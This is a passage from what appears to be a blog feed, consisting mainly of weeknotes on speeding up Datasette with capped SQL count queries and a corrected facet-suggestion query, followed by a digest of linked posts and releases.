    &lt;p&gt;&lt;small&gt;&lt;/small&gt;Via &lt;a href="https://news.ycombinator.com/item?id=41338877"&gt;Hacker News&lt;/a&gt;&lt;/small&gt;&lt;/p&gt;


    &lt;p&gt;Tags: &lt;a href="https://simonwillison.net/tags/google"&gt;google&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/pdf"&gt;pdf&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/seo"&gt;seo&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/sql"&gt;sql&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/ai"&gt;ai&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/julia-evans"&gt;julia-evans&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/generative-ai"&gt;generative-ai&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/llms"&gt;llms&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/gemini"&gt;gemini&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/slop"&gt;slop&lt;/a&gt;&lt;/p&gt;



</summary><category term="google"/><category term="pdf"/><category term="seo"/><category term="sql"/><category term="ai"/><category term="julia-evans"/><category term="generative-ai"/><category term="llms"/><category term="gemini"/><category term="slop"/></entry><entry><title>Optimizing Datasette (and other weeknotes)</title><link href="https://simonwillison.net/2024/Aug/22/optimizing-datasette/#atom-tag" rel="alternate"/><published>2024-08-22T15:46:43+00:00</published><updated>2024-08-22T15:46:43+00:00</updated><id>https://simonwillison.net/2024/Aug/22/optimizing-datasette/#atom-tag</id><summary type="html">
    &lt;p&gt;I've been working with Alex Garcia on an experiment involving using &lt;a href="https://datasette.io/"&gt;Datasette&lt;/a&gt; to explore FEC contributions. We currently have an 11GB SQLite database - trivial for SQLite to handle, but at the upper end of what I've comfortably explored with Datasette in the past.&lt;/p&gt;
&lt;p&gt;This was just the excuse I needed to dig into some optimizations! The next Datasette alpha release will feature some significant speed improvements for working with large tables - they're available on the &lt;code&gt;main&lt;/code&gt; branch already.&lt;/p&gt;
&lt;h3 id="datasette-tracing"&gt;Datasette tracing&lt;/h3&gt;
&lt;p&gt;Datasette has had a &lt;code&gt;?_trace=1&lt;/code&gt; feature for a while. It's only available if you run Datasette with the &lt;code&gt;trace_debug&lt;/code&gt; setting enabled - which you can do like this:&lt;/p&gt;
&lt;div class="highlight highlight-source-shell"&gt;&lt;pre&gt;datasette -s trace_debug 1 mydatabase.db&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Then any request with &lt;code&gt;?_trace=1&lt;/code&gt; added to the URL will return a JSON blob at the end of the page showing every SQL query that was executed, how long it took and a truncated stack trace showing the code that triggered it.&lt;/p&gt;
&lt;p&gt;Scroll to the bottom of &lt;a href="https://latest.datasette.io/fixtures?_trace=1"&gt;https://latest.datasette.io/fixtures?_trace=1&lt;/a&gt; for an example.&lt;/p&gt;
&lt;p&gt;The JSON isn't very pretty. &lt;a href="https://datasette.io/plugins/datasette-pretty-traces"&gt;datasette-pretty-traces&lt;/a&gt; is a plugin I built to fix that - it turns that JSON into a much nicer visual representation.&lt;/p&gt;
&lt;p&gt;As I dug into tracing I found a nasty bug in the trace mechanism. It was meant to quietly give up on pages longer than 256KB, in order to avoid having to spool potentially megabytes of data into memory rather than streaming it to the client. That code had a bug: the user would get a blank page instead! &lt;a href="https://github.com/simonw/datasette/issues/2404"&gt;I fixed that first&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;The next problem was that SQL queries that terminated with an error - including the crucial "query interrupted" error raised when a query took longer than the Datasette configured time limit - were not being included in the trace. That's &lt;a href="https://github.com/simonw/datasette/issues/2405"&gt;fixed too&lt;/a&gt;, and I &lt;a href="https://github.com/simonw/datasette-pretty-traces/issues/8"&gt;upgraded datasette-pretty-traces&lt;/a&gt; to render those errors with a pink background:&lt;/p&gt;
&lt;p&gt;&lt;img src="https://static.simonwillison.net/static/2024/datasette-pretty-traces-error.jpg" alt="Screenshot showing the new UI - a select * from no_table query is highlighted in pink and has an expanded box with information about where that call was made in the Python code and how long it took. Other queries show a bar indicating how long they took to run." style="max-width: 100%;" /&gt;&lt;/p&gt;
&lt;p&gt;This gave me all the information I needed to track down those other performance problems.&lt;/p&gt;
&lt;h4 id="rule-of-thumb-don-t-scan-more-than-10-000-rows"&gt;Rule of thumb: don't scan more than 10,000 rows&lt;/h4&gt;
&lt;p&gt;SQLite is fast, but you can still run into performance problems if you ask it to scan too many rows.&lt;/p&gt;
&lt;p&gt;Going forward, I'm introducing a new target for Datasette development: never scan more than 10,000 rows without a user explicitly requesting that scan.&lt;/p&gt;
&lt;p&gt;The most common time this happens is with a &lt;code&gt;select count(*)&lt;/code&gt; query. Datasette likes to display the number of rows in a table, and when you run a SQL query it likes to show you how many total rows match even when only displaying a subset of them in the paginated interface.&lt;/p&gt;
&lt;p&gt;These counts are shown in two key places: on the list of tables in a database, and on the table view itself.&lt;/p&gt;
&lt;p&gt;Counts are protected by Datasette's query time limit mechanism. On the table listing page this was configured such that if a count takes longer than 5ms it would be skipped and "Many rows" would be displayed. It turns out this mechanism isn't as reliable as I had hoped, maybe due to the overhead of cancelling the query. Given enough large tables those cancelled count queries could still add up to user-visible latency problems on that page.&lt;/p&gt;
&lt;p&gt;Here's the pattern I turned to that fixed the performance problem:&lt;/p&gt;
&lt;div class="highlight highlight-source-sql"&gt;&lt;pre&gt;&lt;span class="pl-k"&gt;select&lt;/span&gt; &lt;span class="pl-c1"&gt;count&lt;/span&gt;(&lt;span class="pl-k"&gt;*&lt;/span&gt;) &lt;span class="pl-k"&gt;from&lt;/span&gt; (
    &lt;span class="pl-k"&gt;select&lt;/span&gt; &lt;span class="pl-k"&gt;*&lt;/span&gt; &lt;span class="pl-k"&gt;from&lt;/span&gt; libfec_SA16 &lt;span class="pl-k"&gt;limit&lt;/span&gt; &lt;span class="pl-c1"&gt;10001&lt;/span&gt;
)&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;This nested query first limits the table to 10,001 rows, then counts them. If the count is less than 10,001 we know that the count is entirely accurate. If it's exactly 10,001 we can show "&amp;gt;10,000 rows" in the UI.&lt;/p&gt;
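&lt;p&gt;As a rough illustration, here is a minimal Python sketch of that capped count using the standard library &lt;code&gt;sqlite3&lt;/code&gt; module. The helper names &lt;code&gt;capped_count&lt;/code&gt; and &lt;code&gt;format_count&lt;/code&gt;, the demo tables and the "more than" wording are all hypothetical choices for this example, not Datasette's actual implementation.&lt;/p&gt;

```python
import sqlite3

CAP = 10_000  # mirrors the 10,000 row target described above


def capped_count(conn, table, cap=CAP):
    """Return (count, is_exact) while scanning at most cap + 1 rows."""
    # Assumption: the table name comes from trusted code, not user input,
    # because identifiers cannot be bound as SQL parameters.
    sql = f'select count(*) from (select * from "{table}" limit ?)'
    (count,) = conn.execute(sql, (cap + 1,)).fetchone()
    # Reaching cap + 1 means the table holds more rows than the cap
    if count == cap + 1:
        return cap, False
    return count, True


def format_count(count, is_exact):
    """Render the count roughly the way the UI text above describes."""
    prefix = "" if is_exact else "more than "
    return f"{prefix}{count:,} rows"


# Demo data: one table below the cap, one above it
conn = sqlite3.connect(":memory:")
conn.execute("create table small (id integer primary key)")
conn.execute("create table big (id integer primary key)")
conn.executemany("insert into small (id) values (?)", [(i,) for i in range(250)])
conn.executemany("insert into big (id) values (?)", [(i,) for i in range(25_000)])

small_result = capped_count(conn, "small")
big_result = capped_count(conn, "big")
print(format_count(*small_result))
print(format_count(*big_result))
```

&lt;p&gt;Asking for one row more than the cap is what lets a single query tell "exactly 10,000 rows" apart from "at least 10,001 rows".&lt;/p&gt;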
&lt;p&gt;Capping the number of scanned rows to 10,000 for any of these counts makes a &lt;em&gt;huge&lt;/em&gt; difference in the performance of these pages!&lt;/p&gt;
&lt;p&gt;But what about those table pages? Showing "&amp;gt;10,000 rows" is a bit of a cop-out, especially if the question the user wants to answer is "how many rows are in this table / match this filter?"&lt;/p&gt;
&lt;p&gt;I addressed that in &lt;a href="https://github.com/simonw/datasette/issues/2408"&gt;issue #2408&lt;/a&gt;: Datasette still truncates the count at 10,000 on initial page load, but users now get a "count all" link they can click to execute the full count.&lt;/p&gt;
&lt;p&gt;The link goes to a SQL query page that runs the query, but I've also added a bit of progressive enhancement JavaScript to run that query and update the page in-place when the link is clicked. Here's what that looks like:&lt;/p&gt;
&lt;p&gt;&lt;img src="https://static.simonwillison.net/static/2024/datasette-count.gif" alt="Animated demo - the pgae shows  /&gt;10,000 rows with a count all link. Clicking that replaces it with the text counting... which then replaces the entire count text with 23,036,621 rows." style="max-width: 100%;" /&gt;&lt;/p&gt;
&lt;p&gt;In the future I may add various caching mechanisms so that counts that have been calculated can be displayed elsewhere in the UI without having to re-run the expensive queries. I may also incorporate SQL triggers for updating exact denormalized counts in a &lt;code&gt;_counts&lt;/code&gt; table, &lt;a href="https://sqlite-utils.datasette.io/en/stable/python-api.html#python-api-cached-table-counts"&gt;as implemented in sqlite-utils&lt;/a&gt;.&lt;/p&gt;
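&lt;p&gt;To make the trigger idea concrete, here is a small sketch of trigger-maintained counts using Python's &lt;code&gt;sqlite3&lt;/code&gt; module. The &lt;code&gt;docs&lt;/code&gt; table, the trigger names and the exact &lt;code&gt;_counts&lt;/code&gt; layout are assumptions made for this example; the schema sqlite-utils really creates may differ.&lt;/p&gt;

```python
import sqlite3

conn = sqlite3.connect(":memory:")
conn.executescript(
    """
    create table docs (id integer primary key, title text);

    -- Hypothetical layout: one row per tracked table
    create table _counts ([table] text primary key, count integer default 0);
    insert into _counts ([table], count) values ('docs', 0);

    -- Keep the stored count in step with every insert and delete
    create trigger docs_counts_insert after insert on docs
    begin
        update _counts set count = count + 1 where [table] = 'docs';
    end;

    create trigger docs_counts_delete after delete on docs
    begin
        update _counts set count = count - 1 where [table] = 'docs';
    end;
    """
)

conn.executemany(
    "insert into docs (title) values (?)",
    [(f"doc {i}",) for i in range(5)],
)
conn.execute("delete from docs where id in (1, 2)")

# Reading the count is now a primary key lookup instead of a table scan
(docs_count,) = conn.execute(
    "select count from _counts where [table] = 'docs'"
).fetchone()
print(docs_count)
```

&lt;p&gt;The trade-off is a little extra work on every write in exchange for exact counts that never require scanning the table.&lt;/p&gt;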
&lt;h4 id="optimized-facet-suggestions"&gt;Optimized facet suggestions&lt;/h4&gt;
&lt;p&gt;The other feature that was really hurting performance was facet suggestions.&lt;/p&gt;
&lt;p&gt;Datasette &lt;a href="https://docs.datasette.io/en/latest/facets.html"&gt;Facets&lt;/a&gt; are a really powerful way to quickly explore data. They can be applied to any column by the user, but to make the feature more visible Datasette suggests facets that might be a good fit for the current table by looking for things like columns that only contain 3 unique values.&lt;/p&gt;
&lt;p&gt;The suggestion code was designed with performance in mind - it uses tight time limits (governed by the &lt;a href="https://docs.datasette.io/en/latest/settings.html#facet-suggest-time-limit-ms"&gt;facet_suggest_time_limit_ms&lt;/a&gt; setting, defaulting to 50ms) and attempts to use other SQL tricks to quickly decide if a facet should be considered or not.&lt;/p&gt;
&lt;p&gt;I found a couple of tricks to dramatically speed these up against larger tables as well.&lt;/p&gt;
&lt;p&gt;First, I've started enforcing that new 10,000 limit for facet suggestions too - so each suggestion query only considers a maximum of 10,000 rows, even on tables with millions of items. These suggestions are just suggestions, so occasionally seeing a recommendation that would not have been suggested if the full table had been scanned is a reasonable trade-off.&lt;/p&gt;
&lt;p&gt;Secondly, I spotted &lt;a href="https://github.com/simonw/datasette/issues/2407"&gt;a gnarly bug&lt;/a&gt; in the way the date facet suggestion works. The previous query looked like this:&lt;/p&gt;
&lt;div class="highlight highlight-source-sql"&gt;&lt;pre&gt;&lt;span class="pl-k"&gt;select&lt;/span&gt; &lt;span class="pl-k"&gt;date&lt;/span&gt;(column_to_test) &lt;span class="pl-k"&gt;from&lt;/span&gt; ( 
    &lt;span class="pl-k"&gt;select&lt;/span&gt; &lt;span class="pl-k"&gt;*&lt;/span&gt; &lt;span class="pl-k"&gt;from&lt;/span&gt; mytable
)
&lt;span class="pl-k"&gt;where&lt;/span&gt; column_to_test glob &lt;span class="pl-s"&gt;&lt;span class="pl-pds"&gt;"&lt;/span&gt;????-??-*&lt;span class="pl-pds"&gt;"&lt;/span&gt;&lt;/span&gt;
&lt;span class="pl-k"&gt;limit&lt;/span&gt; &lt;span class="pl-c1"&gt;100&lt;/span&gt;;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;That &lt;code&gt;limit 100&lt;/code&gt; was meant to restrict it to considering 100 rows... but that didn't actually work! The limit applies to the rows &lt;em&gt;returned&lt;/em&gt;, not the rows examined, so if a table with 20 million rows had NO rows that matched the glob pattern, the query would still scan all 20 million rows.&lt;/p&gt;
&lt;p&gt;The new query looks like this, and fixes the problem:&lt;/p&gt;
&lt;div class="highlight highlight-source-sql"&gt;&lt;pre&gt;&lt;span class="pl-k"&gt;select&lt;/span&gt; &lt;span class="pl-k"&gt;date&lt;/span&gt;(column_to_test) &lt;span class="pl-k"&gt;from&lt;/span&gt; ( 
    &lt;span class="pl-k"&gt;select&lt;/span&gt; &lt;span class="pl-k"&gt;*&lt;/span&gt; &lt;span class="pl-k"&gt;from&lt;/span&gt; mytable &lt;span class="pl-k"&gt;limit&lt;/span&gt; &lt;span class="pl-c1"&gt;100&lt;/span&gt;
)
&lt;span class="pl-k"&gt;where&lt;/span&gt; column_to_test glob &lt;span class="pl-s"&gt;&lt;span class="pl-pds"&gt;"&lt;/span&gt;????-??-*&lt;span class="pl-pds"&gt;"&lt;/span&gt;&lt;/span&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Moving the limit to the inner query causes the SQL to only run against the first 100 rows, as intended.&lt;/p&gt;
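&lt;p&gt;One way to see the difference for yourself is to count how much work SQLite does for each version of the query. This sketch uses the &lt;code&gt;set_progress_handler()&lt;/code&gt; method from Python's &lt;code&gt;sqlite3&lt;/code&gt; module as a rough proxy for rows scanned. The helper &lt;code&gt;count_vm_ticks&lt;/code&gt;, the 50,000 row demo table and the tick interval of 100 are all assumptions for illustration, and the exact numbers will vary between SQLite versions.&lt;/p&gt;

```python
import sqlite3


def count_vm_ticks(conn, sql):
    """Run sql and return (rows, ticks), where ticks roughly measures work."""
    ticks = 0

    def on_tick():
        nonlocal ticks
        ticks += 1
        return 0  # returning 0 lets the query continue

    # Ask SQLite to call on_tick every 100 virtual machine instructions
    conn.set_progress_handler(on_tick, 100)
    try:
        rows = conn.execute(sql).fetchall()
    finally:
        conn.set_progress_handler(None, 100)  # remove the handler again
    return rows, ticks


conn = sqlite3.connect(":memory:")
conn.execute("create table mytable (column_to_test text)")
# None of these values look like dates, so the glob never matches
conn.executemany(
    "insert into mytable (column_to_test) values (?)",
    [(f"row {i}",) for i in range(50_000)],
)

# Single-quoted string literals are used here for portability
outer_limit_sql = """
select date(column_to_test) from (
    select * from mytable
)
where column_to_test glob '????-??-*'
limit 100
"""
inner_limit_sql = """
select date(column_to_test) from (
    select * from mytable limit 100
)
where column_to_test glob '????-??-*'
"""

outer_rows, outer_ticks = count_vm_ticks(conn, outer_limit_sql)
inner_rows, inner_ticks = count_vm_ticks(conn, inner_limit_sql)
print("outer limit ticks:", outer_ticks)
print("inner limit ticks:", inner_ticks)
```

&lt;p&gt;Both queries return no rows here, but the version with the outer limit should report far more ticks because it has to test every row in the table before giving up.&lt;/p&gt;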
&lt;p&gt;Thanks to these optimizations running Datasette against a database with huge tables now feels snappy and responsive. Expect them in an alpha release soon.&lt;/p&gt;
&lt;h4 id="on-the-blog"&gt;On the blog&lt;/h4&gt;
&lt;p&gt;I'm trying something new for the rest of my weeknotes. Since I'm investing a lot more effort in my link blog, I'm including a digest of everything I've linked to since the last edition. I &lt;a href="https://observablehq.com/@simonw/weeknotes"&gt;updated my weeknotes Observable notebook&lt;/a&gt; to help generate these, after &lt;a href="https://gist.github.com/simonw/d7f4f2950b426839f36713ed0ecf8c5d"&gt;prompting Claude&lt;/a&gt; to help prototype a bunch of different approaches.&lt;/p&gt;
&lt;p&gt;The following section was generated by this code - it includes everything I've posted, grouped by the most "interesting" tag assigned to each post. I'll likely iterate on this a bunch more in the future.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;openai&lt;/strong&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;
&lt;a href="https://simonwillison.net/2024/Aug/6/openai-structured-outputs"&gt;OpenAI: Introducing Structured Outputs in the API&lt;/a&gt; - 2024-08-06&lt;/li&gt;
&lt;li&gt;
&lt;a href="https://simonwillison.net/2024/Aug/8/gpt-4o-system-card"&gt;GPT-4o System Card&lt;/a&gt; - 2024-08-08&lt;/li&gt;
&lt;li&gt;
&lt;a href="https://simonwillison.net/2024/Aug/11/sqlite-vec"&gt;Using sqlite-vec with embeddings in sqlite-utils and Datasette&lt;/a&gt; - 2024-08-11&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;strong&gt;javascript&lt;/strong&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;
&lt;a href="https://simonwillison.net/2024/Aug/6/observable-plot-waffle-mark"&gt;Observable Plot: Waffle mark&lt;/a&gt; - 2024-08-06&lt;/li&gt;
&lt;li&gt;
&lt;a href="https://simonwillison.net/2024/Aug/18/reckoning"&gt;Reckoning&lt;/a&gt; - 2024-08-18&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;strong&gt;python&lt;/strong&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;
&lt;a href="https://simonwillison.net/2024/Aug/6/cibuildwheel"&gt;cibuildwheel 2.20.0 now builds Python 3.13 wheels by default&lt;/a&gt; - 2024-08-06&lt;/li&gt;
&lt;li&gt;
&lt;a href="https://simonwillison.net/2024/Aug/8/django-http-debug"&gt;django-http-debug, a new Django app mostly written by Claude&lt;/a&gt; - 2024-08-08&lt;/li&gt;
&lt;li&gt;
&lt;a href="https://simonwillison.net/2024/Aug/11/pep-750"&gt;PEP 750 – Tag Strings For Writing Domain-Specific Languages&lt;/a&gt; - 2024-08-11&lt;/li&gt;
&lt;li&gt;
&lt;a href="https://simonwillison.net/2024/Aug/13/mlx-whisper"&gt;mlx-whisper&lt;/a&gt; - 2024-08-13&lt;/li&gt;
&lt;li&gt;
&lt;a href="https://simonwillison.net/2024/Aug/17/python-m-pytest"&gt;Upgrading my cookiecutter templates to use python -m pytest&lt;/a&gt; - 2024-08-17&lt;/li&gt;
&lt;li&gt;
&lt;a href="https://simonwillison.net/2024/Aug/20/writing-your-pyproject-toml"&gt;Writing your pyproject.toml&lt;/a&gt; - 2024-08-20&lt;/li&gt;
&lt;li&gt;
&lt;a href="https://simonwillison.net/2024/Aug/20/uv-unified-python-packaging"&gt;uv: Unified Python packaging&lt;/a&gt; - 2024-08-20&lt;/li&gt;
&lt;li&gt;
&lt;a href="https://simonwillison.net/2024/Aug/21/usrbinenv-uv-run"&gt;#!/usr/bin/env -S uv run&lt;/a&gt; - 2024-08-21&lt;/li&gt;
&lt;li&gt;
&lt;a href="https://simonwillison.net/2024/Aug/21/armin-ronacher"&gt;Armin Ronacher: There is an elephant in the room which is that As...&lt;/a&gt; - 2024-08-21&lt;/li&gt;
&lt;li&gt;
&lt;a href="https://simonwillison.net/2024/Aug/22/light-the-torch"&gt;light-the-torch&lt;/a&gt; - 2024-08-22&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;strong&gt;security&lt;/strong&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;
&lt;a href="https://simonwillison.net/2024/Aug/7/google-ai-studio-data-exfiltration-demo"&gt;Google AI Studio data exfiltration demo&lt;/a&gt; - 2024-08-07&lt;/li&gt;
&lt;li&gt;
&lt;a href="https://simonwillison.net/2024/Aug/12/smuggling-queries-at-the-protocol-level"&gt;SQL Injection Isn't Dead: Smuggling Queries at the Protocol Level&lt;/a&gt; - 2024-08-12&lt;/li&gt;
&lt;li&gt;
&lt;a href="https://simonwillison.net/2024/Aug/14/living-off-microsoft-copilot"&gt;Links and materials for Living off Microsoft Copilot&lt;/a&gt; - 2024-08-14&lt;/li&gt;
&lt;li&gt;
&lt;a href="https://simonwillison.net/2024/Aug/15/adam-newbold"&gt;Adam Newbold: [Passkeys are] something truly unique, because ba...&lt;/a&gt; - 2024-08-15&lt;/li&gt;
&lt;li&gt;
&lt;a href="https://simonwillison.net/2024/Aug/16/com2kid"&gt;com2kid: Having worked at Microsoft for almost a decade, I...&lt;/a&gt; - 2024-08-16&lt;/li&gt;
&lt;li&gt;
&lt;a href="https://simonwillison.net/2024/Aug/20/data-exfiltration-from-slack-ai"&gt;Data Exfiltration from Slack AI via indirect prompt injection&lt;/a&gt; - 2024-08-20&lt;/li&gt;
&lt;li&gt;
&lt;a href="https://simonwillison.net/2024/Aug/20/sql-injection-like-attack-on-llms-with-special-tokens"&gt;SQL injection-like attack on LLMs with special tokens&lt;/a&gt; - 2024-08-20&lt;/li&gt;
&lt;li&gt;
&lt;a href="https://simonwillison.net/2024/Aug/21/dangers-of-ai-agents-unfurling"&gt;The dangers of AI agents unfurling hyperlinks and what to do about it&lt;/a&gt; - 2024-08-21&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;strong&gt;llm&lt;/strong&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;
&lt;a href="https://simonwillison.net/2024/Aug/7/q-what-do-i-title-this-article"&gt;q What do I title this article?&lt;/a&gt; - 2024-08-07&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;strong&gt;prompt-engineering&lt;/strong&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;
&lt;a href="https://simonwillison.net/2024/Aug/7/braggoscope-prompts"&gt;Braggoscope Prompts&lt;/a&gt; - 2024-08-07&lt;/li&gt;
&lt;li&gt;
&lt;a href="https://simonwillison.net/2024/Aug/11/using-gpt-4o-mini-as-a-reranker"&gt;Using gpt-4o-mini as a reranker&lt;/a&gt; - 2024-08-11&lt;/li&gt;
&lt;li&gt;
&lt;a href="https://simonwillison.net/2024/Aug/16/llms-are-bad-at-returning-code-in-json"&gt;LLMs are bad at returning code in JSON&lt;/a&gt; - 2024-08-16&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;strong&gt;andrej-karpathy&lt;/strong&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;
&lt;a href="https://simonwillison.net/2024/Aug/8/andrej-karpathy"&gt;Andrej Karpathy: The RM [Reward Model] we train for LLMs is just a...&lt;/a&gt; - 2024-08-08&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;strong&gt;projects&lt;/strong&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;
&lt;a href="https://simonwillison.net/2024/Aug/8/convert-claude-json-to-markdown"&gt;Share Claude conversations by converting their JSON to Markdown&lt;/a&gt; - 2024-08-08&lt;/li&gt;
&lt;li&gt;
&lt;a href="https://simonwillison.net/2024/Aug/16/datasette-10a15"&gt;Datasette 1.0a15&lt;/a&gt; - 2024-08-16&lt;/li&gt;
&lt;li&gt;
&lt;a href="https://simonwillison.net/2024/Aug/16/datasette-checkbox"&gt;datasette-checkbox&lt;/a&gt; - 2024-08-16&lt;/li&gt;
&lt;li&gt;
&lt;a href="https://simonwillison.net/2024/Aug/18/fix-covidsewage-bot"&gt;Fix @covidsewage bot to handle a change to the underlying website&lt;/a&gt; - 2024-08-18&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;strong&gt;anthropic&lt;/strong&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;
&lt;a href="https://simonwillison.net/2024/Aug/8/gemini-15-flash-price-drop"&gt;Gemini 1.5 Flash price drop&lt;/a&gt; - 2024-08-08&lt;/li&gt;
&lt;li&gt;
&lt;a href="https://simonwillison.net/2024/Aug/14/prompt-caching-with-claude"&gt;Prompt caching with Claude&lt;/a&gt; - 2024-08-14&lt;/li&gt;
&lt;li&gt;
&lt;a href="https://simonwillison.net/2024/Aug/15/alex-albert"&gt;Alex Albert: Examples are the #1 thing I recommend people use ...&lt;/a&gt; - 2024-08-15&lt;/li&gt;
&lt;li&gt;
&lt;a href="https://simonwillison.net/2024/Aug/20/introducing-zed-ai"&gt;Introducing Zed AI&lt;/a&gt; - 2024-08-20&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;strong&gt;sqlite&lt;/strong&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;
&lt;a href="https://simonwillison.net/2024/Aug/9/high-precision-datetime-in-sqlite"&gt;High-precision date/time in SQLite&lt;/a&gt; - 2024-08-09&lt;/li&gt;
&lt;li&gt;
&lt;a href="https://simonwillison.net/2024/Aug/13/django-querystring-template-tag"&gt;New Django {% querystring %} template tag&lt;/a&gt; - 2024-08-13&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;strong&gt;ethics&lt;/strong&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;
&lt;a href="https://simonwillison.net/2024/Aug/10/where-facebooks-ai-slop-comes-from"&gt;Where Facebook's AI Slop Comes From&lt;/a&gt; - 2024-08-10&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;strong&gt;jon-udell&lt;/strong&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;
&lt;a href="https://simonwillison.net/2024/Aug/10/jon-udell"&gt;Jon Udell: Some argue that by aggregating knowledge drawn fr...&lt;/a&gt; - 2024-08-10&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;strong&gt;browsers&lt;/strong&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;
&lt;a href="https://simonwillison.net/2024/Aug/11/ladybird-set-to-adopt-swift"&gt;Ladybird set to adopt Swift&lt;/a&gt; - 2024-08-11&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;strong&gt;explorables&lt;/strong&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;
&lt;a href="https://simonwillison.net/2024/Aug/11/transformer-explainer"&gt;Transformer Explainer&lt;/a&gt; - 2024-08-11&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;strong&gt;ai-assisted-programming&lt;/strong&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;
&lt;a href="https://simonwillison.net/2024/Aug/12/tom-macwright"&gt;Tom MacWright: But [LLM assisted programming] does make me wonde...&lt;/a&gt; - 2024-08-12&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;strong&gt;hacker-news&lt;/strong&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;
&lt;a href="https://simonwillison.net/2024/Aug/12/dang"&gt;dang: We had to exclude [dead] and eventually even just...&lt;/a&gt; - 2024-08-12&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;strong&gt;design&lt;/strong&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;
&lt;a href="https://simonwillison.net/2024/Aug/13/ai-designers"&gt;Help wanted: AI designers&lt;/a&gt; - 2024-08-13&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;strong&gt;prompt-injection&lt;/strong&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;
&lt;a href="https://simonwillison.net/2024/Aug/14/simple-prompt-injection-template"&gt;A simple prompt injection template&lt;/a&gt; - 2024-08-14&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;strong&gt;fly&lt;/strong&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;
&lt;a href="https://simonwillison.net/2024/Aug/16/fly-were-cutting-l40s-prices-in-half"&gt;Fly: We're Cutting L40S Prices In Half&lt;/a&gt; - 2024-08-16&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;strong&gt;open-source&lt;/strong&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;
&lt;a href="https://simonwillison.net/2024/Aug/16/whither-cockroachdb"&gt;Whither CockroachDB?&lt;/a&gt; - 2024-08-16&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;strong&gt;game-design&lt;/strong&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;
&lt;a href="https://simonwillison.net/2024/Aug/18/the-door-problem"&gt;“The Door Problem”&lt;/a&gt; - 2024-08-18&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;strong&gt;whisper&lt;/strong&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;
&lt;a href="https://simonwillison.net/2024/Aug/19/whisperfile"&gt;llamafile v0.8.13 (and whisperfile)&lt;/a&gt; - 2024-08-19&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;strong&gt;go&lt;/strong&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;
&lt;a href="https://simonwillison.net/2024/Aug/19/migrating-mess-with-dns"&gt;Migrating Mess With DNS to use PowerDNS&lt;/a&gt; - 2024-08-19&lt;/li&gt;
&lt;/ul&gt;
&lt;h4 id="releases"&gt;Releases&lt;/h4&gt;
&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;&lt;a href="https://github.com/simonw/datasette-pretty-traces/releases/tag/0.5"&gt;datasette-pretty-traces 0.5&lt;/a&gt;&lt;/strong&gt; - 2024-08-21&lt;br /&gt;Prettier formatting for ?_trace=1 traces&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;&lt;a href="https://github.com/simonw/sqlite-utils-ask/releases/tag/0.1a0"&gt;sqlite-utils-ask 0.1a0&lt;/a&gt;&lt;/strong&gt; - 2024-08-19&lt;br /&gt;Ask questions of your data with LLM assistance&lt;/li&gt;
&lt;li&gt;
